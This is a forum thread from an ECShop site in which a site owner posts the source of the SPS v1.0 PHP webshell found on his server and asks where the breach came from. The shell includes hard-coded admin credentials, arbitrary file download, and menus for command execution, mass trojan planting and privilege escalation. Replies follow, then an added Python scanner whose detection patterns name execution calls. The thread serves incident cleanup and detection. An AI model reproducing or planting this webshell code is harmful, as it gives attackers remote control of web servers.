Got hit with a web trojan again. I'm posting the trojan file so everyone can analyze it: where exactly is the vulnerability?

2016-07-07 15:22 Source: www.chinab4c.com Author: ecshop expert

[code]<?php
error_reporting(7);
ob_start();
$user="21232f297a57a5a743894a0e4a801fc3"; // 32-character md5 hash; default user is admin
$pass="21232f297a57a5a743894a0e4a801fc3"; // 32-character md5 hash; default password is admin
if (get_magic_quotes_gpc()) {
$_GET = array_stripslashes($_GET);
$_POST = array_stripslashes($_POST);
}
if($_GET['s']=='login'){
setcookie('username',md5($_POST['username']));
setcookie('password',md5($_POST['password']));
die('<meta http-equiv="refresh" content="1;URL=?s=main">');
}
if($_GET['s']=='logout'){
setcookie('username',null);
setcookie('password',null);
die('<meta http-equiv="refresh" content="1;URL=?s=">');
}
if($_COOKIE['username']!=$user || $_COOKIE['password']!=$pass){
die('<form method="post" action="?s=login"><center><br><br><br>SPS v1.0 Code By Spider. <br><br>Username: <input type="text" name="username"><br> Password: <input type="password" name="password"> <br><input type="submit" name="submit" value="login"></center></form>');
}
$paget = explode(' ', microtime());
$stime = $paget[1] + $paget[0];
$serverip=$HTTP_SERVER_VARS["REMOTE_ADDR"];
$scanip=$HTTP_POST_VARS['remoteip'];
if (!empty($_GET['fd'])) {
$fd=$_GET['fd'];
if (!@file_exists($fd)) {
echo "<script>window.alert('下载文件不存在');history.go(-1);</script>";
} else {
$fn = basename($fd);
$fn_info = explode('.', $fn);
$fe = $fn_info[count($fn_info)-1];
header('Content-type: application/x-'.$fe);
header('Content-Disposition: attachment; filename='.$fn);
header('Content-Description: PHP3 Generated Data');
@readfile($fd);
exit;
}
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>SPS v1.0</title>
</head>
<style type="text/css">
<!--
#PR {width:850px!important;width:850px}
#Pr table{border-style:solid; border-color:#000000}
td {
font-family: Arial;
font-size: 14px;
}
a:link {
color: #0000FF;
text-decoration: none;
}
a:visited {
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #ff0000;
text-decoration: none;
}
-->
</STYLE>
<body bgcolor="#EDEDED" text="#000000">
<center>
<div id=PR>
<table border="0">
<td>
<div align="center">
<table width=100% border=0 cellspacing=0 cellpadding=0>
</div></td></table>
<table width="850">
<tr>
<td bgcolor="#AAAAAA">
<div align="center">
<font face=Webdings size=6><b>!</font>
<font size="5"> SPS(Spider PHP Shell)v1.0 </font><br>
■服务器IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']);?>
■运行环境: <?php echo @$_SERVER["SERVER_SOFTWARE"];?>
<br>■MySQL: <?php echo @function_exists(mysql_connect) ? "开启" : "关闭" ?>
■脚本路径: <?php echo str_replace('\\','/',__FILE__);?>
</b><br></div></td></tr></table>
<table width="850">
<tr>
<td bgcolor="#AAAAAA">
<div align="center">
【<a href="?s=main">文件管理</a>】
【<a href="?s=port">端口扫描</a>】
【<a href="?s=guama">批量挂马</a>】
【<a href="?s=sfile">文件查找</a>】
【<a href="?s=execute">执行命令</a>】
【<a href="?s=tools">提权工具</a>】
【<a href="?s=sqlexp">数据库操作</a>】
【<a href="?s=logout">退出程序</a></a>】
</div></td></tr></table>
<?php
$s = isset($_GET['s']) ? $_GET['s'] : "";// check whether the variable is set
$p = isset($_GET['p']) ? $_GET['p'] : "";
$f = isset($_GET['f']) ? $_GET['f'] : "";
$fpath = isset($_GET['path']) ? $_GET['path'] : "";
$path=str_replace('\\','/',dirname(__FILE__)).'/';
if($fpath!=""){!$path && $path = '.';$paths=str_replace('//','/',$_GET['path']);$path1=str_replace('//','/',opath($path,$paths));ofile($path1);}
switch($s){// function dispatch
case "main": ofile($path);break;
case "redir": redir($p);break;
case "refile": refile($p);break;
case "upload": upload($p);break;
case "edit": edit($p,$f);break;
case "del": del($p,$f,$_GET['i']);break;
case "perms": perms($p,$f);break;
case "ref": ref($p,$f);break;
case "cfile": cfile($p,$f);break;
case "deldir": deldir($p,$f);break;
case "port": port($serverip,$scanip);break;
case "guama": guama($path);break;
case "qingma": qingma($path);break;
case "sfile": sfile($path);break;
case "execute": execute();break;
case "phpeval": phpeval();break;
case "serexp": serexp();break;
case "sqllogin": sqllogin();break;
case "sql": sql();break;
case "sqlexp": sqlexp();break;
case "tools": tools($path);break;
case "crack": crack();break;
case "phpinfo": phpinfo();break;
default: break;
}
// copyright
$licensehack=array("67","111","100","101","32","98","121","32","83","112","105","100","101","114","46","32","77","97","107","101","32","105","110","32","67","104","105","110","97","46","32","81","81","56","48","57","51","55","52","51","48","46");
echo '<table width="850"><tr align="center"><td bgcolor="#6959CD"><a target="_blank" href="?s=phpinfo"><b>PHPINFO</b></a> <b>License: ';
[/code]

Answers:
This is a server vulnerability or a vulnerability in the website application that was used to plant a trojan backdoor file. Best to check the server and upgrade to the latest version.

Server security issues also need to be considered.

You need to check for extra files. The file name may have been changed to a variant.

Thanks for everyone's suggestions.
I found out that this code is a hacker tool called SPS v1.0 Code By Spider.
I have now updated some of the modified files, but the malicious ads still basically pop up again around 12 o'clock at night.
The problem is still being worked on...
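The replies above suggest checking the web root for extra or renamed files. The scanner below is an added example for that cleanup step; it is not code from the thread, from the ECShop project, or from the shell's author. It walks a directory tree and reports files that carry the signature strings visible in the posted SPS v1.0 source ("SPS v1.0", "Code By Spider"), files matching generic webshell heuristics (a hard-coded 32-hex credential like the md5 constants in the shell, a superglobal fed straight into a file operation, or a code/command execution call), and PHP files sitting inside upload or data directories where no executable code belongs. The sample web root, its file contents, the `build_sample_tree` helper, the `UPLOAD_DIRS` list and the `NOW` timestamp are all constructed for the example. Modification times are reported only as supporting context because an attacker can reset them with `touch`, so a clean mtime is not evidence of a clean file.

```python
"""Walk a web root and flag likely webshell files (added example, not from the thread)."""
import os
import re
import tempfile
import time
from pathlib import Path

# Strings taken from the SPS v1.0 source posted in the thread above.
SIGNATURES = ("SPS v1.0", "Spider PHP Shell", "Code By Spider")

# Generic heuristics, constructed for this example: (label, regex).
HEURISTICS = (
    ("hard-coded 32-hex credential",
     re.compile(r"=\s*[\"'][0-9a-f]{32}[\"']", re.I)),
    ("superglobal in file operation",
     re.compile(r"\b(readfile|include|require|include_once|require_once|fopen|"
                r"file_get_contents|file_put_contents|unlink)\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("code/command execution call",
     re.compile(r"\b(eval|assert|system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I)),
)

PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".inc"}
# Directories that normally hold uploads/data, never executable PHP (assumed names).
UPLOAD_DIRS = {"images", "upload", "uploads", "data", "temp", "cache"}

# Fixed "current time" so the constructed sample yields deterministic ages.
NOW = 1_700_000_000

# Constructed sample web root: (relative path, file body, age in seconds).
SAMPLE_FILES = (
    ("index.php", "<?php include 'includes/init.php'; echo \"hello\"; ?>\n", 90 * 86400),
    ("includes/init.php", "<?php $cfg = array('db' => 'ecshop'); ?>\n", 90 * 86400),
    # Fragment carrying the posted shell's banner and md5 constant, dropped into images/.
    ("images/update.php",
     "<?php\n$user=\"21232f297a57a5a743894a0e4a801fc3\";\n"
     "die('SPS v1.0 Code By Spider.');\n?>\n", 3600),
    # Harmless eval() call, enough to trip the execution-call heuristic.
    ("admin/tools.php", "<?php eval('1;'); ?>\n", 2 * 86400),
)


def scan_file(path: Path, rel: Path, now: float, recent_days: int) -> list:
    """Return a list of reasons this file looks suspicious (empty if none)."""
    reasons = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return reasons
    for sig in SIGNATURES:
        if sig in text:
            reasons.append(f"signature: {sig}")
    for label, rx in HEURISTICS:
        if rx.search(text):
            reasons.append(f"heuristic: {label}")
    dirs = {part.lower() for part in rel.parts[:-1]}
    if path.suffix.lower() in PHP_EXTS and dirs & UPLOAD_DIRS:
        reasons.append("php file inside an upload/data directory")
    # Age is only added as context for files that already hit another rule;
    # mtime can be forged, so it is never used as a clearing criterion.
    age_h = (now - path.stat().st_mtime) / 3600
    if reasons and age_h < recent_days * 24:
        reasons.append(f"modified {age_h:.0f}h ago")
    return reasons


def scan_tree(root, now=None, recent_days: int = 7) -> dict:
    """Map relative path -> reasons for every suspicious file under root."""
    root = Path(root)
    now = time.time() if now is None else now
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        reasons = scan_file(path, rel, now, recent_days)
        if reasons:
            findings[str(rel).replace(os.sep, "/")] = reasons
    return findings


def build_sample_tree(now: float = NOW):
    """Write the constructed sample web root to a temp dir; return (root, now)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for rel, body, age in SAMPLE_FILES:
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
        os.utime(target, (now - age, now - age))
    return root, now


if __name__ == "__main__":
    sample_root, sample_now = build_sample_tree()
    for rel_path, why in scan_tree(sample_root, now=sample_now).items():
        print(rel_path, "->", "; ".join(why))
```

Run it against a real web root with `scan_tree("/path/to/htdocs")`; leaving `now` unset uses the clock. Signature matching catches this exact shell, the heuristics catch renamed variants of the same pattern (the thread's advice about changed file names), and the upload-directory rule catches PHP dropped where only images or data should be. Review every hit by hand before deleting anything, and compare the tree against a known-good copy of the ECShop release rather than trusting this list alone.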